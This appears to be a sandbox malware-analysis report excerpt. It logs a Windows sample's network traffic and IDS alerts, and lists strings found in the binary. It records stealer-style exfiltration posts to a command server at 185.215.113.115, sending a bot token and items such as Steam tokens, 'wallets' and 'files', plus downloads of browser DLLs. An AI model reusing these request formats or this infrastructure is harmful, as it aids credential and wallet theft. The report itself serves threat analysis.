Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKEBFCFIJJKKECAKJEHDHost: 185.215.113.115Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 45 42 46 43 46 49 4a 4a 4b 4b 45 43 41 4b 4a 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 37 32 32 30 34 62 35 37 38 39 32 39 38 33 32 32 62 34 61 34 63 65 30 66 64 61 33 33 61 30 61 63 38 66 62 30 30 31 64 65 33 66 34 35 30 62 32 36 30 36 34 38 34 38 65 65 39 39 62 64 31 64 66 63 38 65 34 63 35 64 36 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 42 46 43 46 49 4a 4a 4b 4b 45 43 41 4b 4a 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 42 46 43 46 49 4a 4a 4b 4b 45 43 41 4b 4a 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 42 46 43 46 49 4a 4a 4b 4b 45 43 41 4b 4a 45 48 44 2d 2d 0d 0a Data Ascii: ------AKEBFCFIJJKKECAKJEHDContent-Disposition: form-data; name="token"572204b5789298322b4a4ce0fda33a0ac8fb001de3f450b26064848ee99bd1dfc8e4c5d6------AKEBFCFIJJKKECAKJEHDContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------AKEBFCFIJJKKECAKJEHDContent-Disposition: form-data; name="file"------AKEBFCFIJJKKECAKJEHD--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCBAAEBKEGHIEBFIJJKHost: 185.215.113.115Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 43 42 41 41 45 42 4b 45 47 48 49 45 42 46 49 4a 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 37 32 32 30 34 62 35 37 38 39 32 39 38 33 32 32 62 34 61 34 63 65 30 66 64 61 33 33 61 30 61 63 38 66 62 30 30 31 64 65 33 66 34 35 30 62 32 36 30 36 34 38 34 38 65 65 39 39 62 64 31 64 66 63 38 65 34 63 35 64 36 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 41 41 45 42 4b 45 47 48 49 45 42 46 49 4a 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 41 41 45 42 4b 45 47 48 49 45 42 46 49 4a 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 41 41 45 42 4b 45 47 48 49 45 42 46 49 4a 4a 4b 2d 2d 0d 0a Data Ascii: ------CFCBAAEBKEGHIEBFIJJKContent-Disposition: form-data; name="token"572204b5789298322b4a4ce0fda33a0ac8fb001de3f450b26064848ee99bd1dfc8e4c5d6------CFCBAAEBKEGHIEBFIJJKContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------CFCBAAEBKEGHIEBFIJJKContent-Disposition: form-data; name="file"------CFCBAAEBKEGHIEBFIJJK--
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDHIEBFHCAKEHIDGHCBAHost: 185.215.113.115Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFHDBGIEBFIIDGCBFBKHost: 185.215.113.115Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 46 48 44 42 47 49 45 42 46 49 49 44 47 43 42 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 37 32 32 30 34 62 35 37 38 39 32 39 38 33 32 32 62 34 61 34 63 65 30 66 64 61 33 33 61 30 61 63 38 66 62 30 30 31 64 65 33 66 34 35 30 62 32 36 30 36 34 38 34 38 65 65 39 39 62 64 31 64 66 63 38 65 34 63 35 64 36 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 48 44 42 47 49 45 42 46 49 49 44 47 43 42 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 48 44 42 47 49 45 42 46 49 49 44 47 43 42 46 42 4b 2d 2d 0d 0a Data Ascii: ------DBFHDBGIEBFIIDGCBFBKContent-Disposition: form-data; name="token"572204b5789298322b4a4ce0fda33a0ac8fb001de3f450b26064848ee99bd1dfc8e4c5d6------DBFHDBGIEBFIIDGCBFBKContent-Disposition: form-data; name="message"wallets------DBFHDBGIEBFIIDGCBFBK--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCBFBGDBKJKECAAKKFHDHost: 185.215.113.115Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 37 32 32 30 34 62 35 37 38 39 32 39 38 33 32 32 62 34 61 34 63 65 30 66 64 61 33 33 61 30 61 63 38 66 62 30 30 31 64 65 33 66 34 35 30 62 32 36 30 36 34 38 34 38 65 65 39 39 62 64 31 64 66 63 38 65 34 63 35 64 36 0d 0a 2d 2d 2d 2d 2d 2d 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 44 2d 2d 0d 0a Data Ascii: ------FCBFBGDBKJKECAAKKFHDContent-Disposition: form-data; name="token"572204b5789298322b4a4ce0fda33a0ac8fb001de3f450b26064848ee99bd1dfc8e4c5d6------FCBFBGDBKJKECAAKKFHDContent-Disposition: form-data; name="message"files------FCBFBGDBKJKECAAKKFHD--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHCBAEHJJJKKFIDGHJECHost: 185.215.113.115Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 37 32 32 30 34 62 35 37 38 39 32 39 38 33 32 32 62 34 61 34 63 65 30 66 64 61 33 33 61 30 61 63 38 66 62 30 30 31 64 65 33 66 34 35 30 62 32 36 30 36 34 38 34 38 65 65 39 39 62 64 31 64 66 63 38 65 34 63 35 64 36 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 43 2d 2d 0d 0a Data Ascii: ------DHCBAEHJJJKKFIDGHJECContent-Disposition: form-data; name="token"572204b5789298322b4a4ce0fda33a0ac8fb001de3f450b26064848ee99bd1dfc8e4c5d6------DHCBAEHJJJKKFIDGHJECContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------DHCBAEHJJJKKFIDGHJECContent-Disposition: form-data; name="file"------DHCBAEHJJJKKFIDGHJEC--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIDAFCAFCBKECBGCFIIJHost: 185.215.113.115Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 44 41 46 43 41 46 43 42 4b 45 43 42 47 43 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 37 32 32 30 34 62 35 37 38 39 32 39 38 33 32 32 62 34 61 34 63 65 30 66 64 61 33 33 61 30 61 63 38 66 62 30 30 31 64 65 33 66 34 35 30 62 32 36 30 36 34 38 34 38 65 65 39 39 62 64 31 64 66 63 38 65 34 63 35 64 36 0d 0a 2d 2d 2d 2d 2d 2d 46 49 44 41 46 43 41 46 43 42 4b 45 43 42 47 43 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 46 49 44 41 46 43 41 46 43 42 4b 45 43 42 47 43 46 49 49 4a 2d 2d 0d 0a Data Ascii: ------FIDAFCAFCBKECBGCFIIJContent-Disposition: form-data; name="token"572204b5789298322b4a4ce0fda33a0ac8fb001de3f450b26064848ee99bd1dfc8e4c5d6------FIDAFCAFCBKECBGCFIIJContent-Disposition: form-data; name="message"ybncbhylepme------FIDAFCAFCBKECBGCFIIJ--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIEHJKJJJECFHJJJKKECHost: 185.215.113.115Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 4b 4a 4a 4a 45 43 46 48 4a 4a 4a 4b 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 37 32 32 30 34 62 35 37 38 39 32 39 38 33 32 32 62 34 61 34 63 65 30 66 64 61 33 33 61 30 61 63 38 66 62 30 30 31 64 65 33 66 34 35 30 62 32 36 30 36 34 38 34 38 65 65 39 39 62 64 31 64 66 63 38 65 34 63 35 64 36 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 4b 4a 4a 4a 45 43 46 48 4a 4a 4a 4b 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 4b 4a 4a 4a 45 43 46 48 4a 4a 4a 4b 4b 45 43 2d 2d 0d 0a Data Ascii: ------IIEHJKJJJECFHJJJKKECContent-Disposition: form-data; name="token"572204b5789298322b4a4ce0fda33a0ac8fb001de3f450b26064848ee99bd1dfc8e4c5d6------IIEHJKJJJECFHJJJKKECContent-Disposition: form-data; name="message"wkkjqaiaxkhb------IIEHJKJJJECFHJJJKKEC--

Source: Joe Sandbox View	IP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox View	IP Address: 185.215.113.115 185.215.113.115

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49731 -> 185.215.113.115:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49753 -> 185.215.113.115:80

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.115
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.115

Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe

Code function: 0_2_6C59CC60 PR_Recv,

0_2_6C59CC60

Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.115Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: apis.google.com
Source: global traffic	DNS traffic detected: DNS query: play.google.com

Source: unknown

HTTP traffic detected: POST /log?format=json&hasfast=true HTTP/1.1Host: play.google.comConnection: keep-aliveContent-Length: 917sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencoded;charset=UTF-8Accept: */*Origin: chrome-untrusted://new-tab-pageX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: 0vsAIy0DhJ.exe, 00000000.00000002.2003720246.0000000000677000.00000040.00000001.01000000.00000003.sdmp, 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.000000000102E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.0000000001088000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.0000000001088000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/68b591d6548ec281/freebl3.dll
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.0000000001088000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/68b591d6548ec281/mozglue.dll
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.00000000010E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/68b591d6548ec281/msvcp140.dll
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.0000000001088000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/68b591d6548ec281/msvcp140.dlla
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.0000000001088000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/68b591d6548ec281/nss3.dll
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.0000000001088000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/68b591d6548ec281/softokn3.dll
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.0000000001088000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/68b591d6548ec281/softokn3.dllp
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.0000000001088000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/68b591d6548ec281/sqlite3.dll
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.0000000001088000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/68b591d6548ec281/sqlite3.dlle
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.0000000001088000.00000004.00000020.00020000.00000000.sdmp, 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.00000000010E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/68b591d6548ec281/vcruntime140.dll
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.00000000010E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/68b591d6548ec281/vcruntime140.dll$
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.00000000010E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/68b591d6548ec281/vcruntime140.dll4
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.00000000010E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/68b591d6548ec281/vcruntime140.dlld
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.0000000001088000.00000004.00000020.00020000.00000000.sdmp, 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.00000000010E0000.00000004.00000020.00020000.00000000.sdmp, 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.00000000010A3000.00000004.00000020.00020000.00000000.sdmp, 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.000000000102E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.php
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.00000000010A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.php3#z7
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.0000000001088000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.php8
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.00000000010E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpB
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.0000000001088000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpD
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.00000000010A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpl:z0
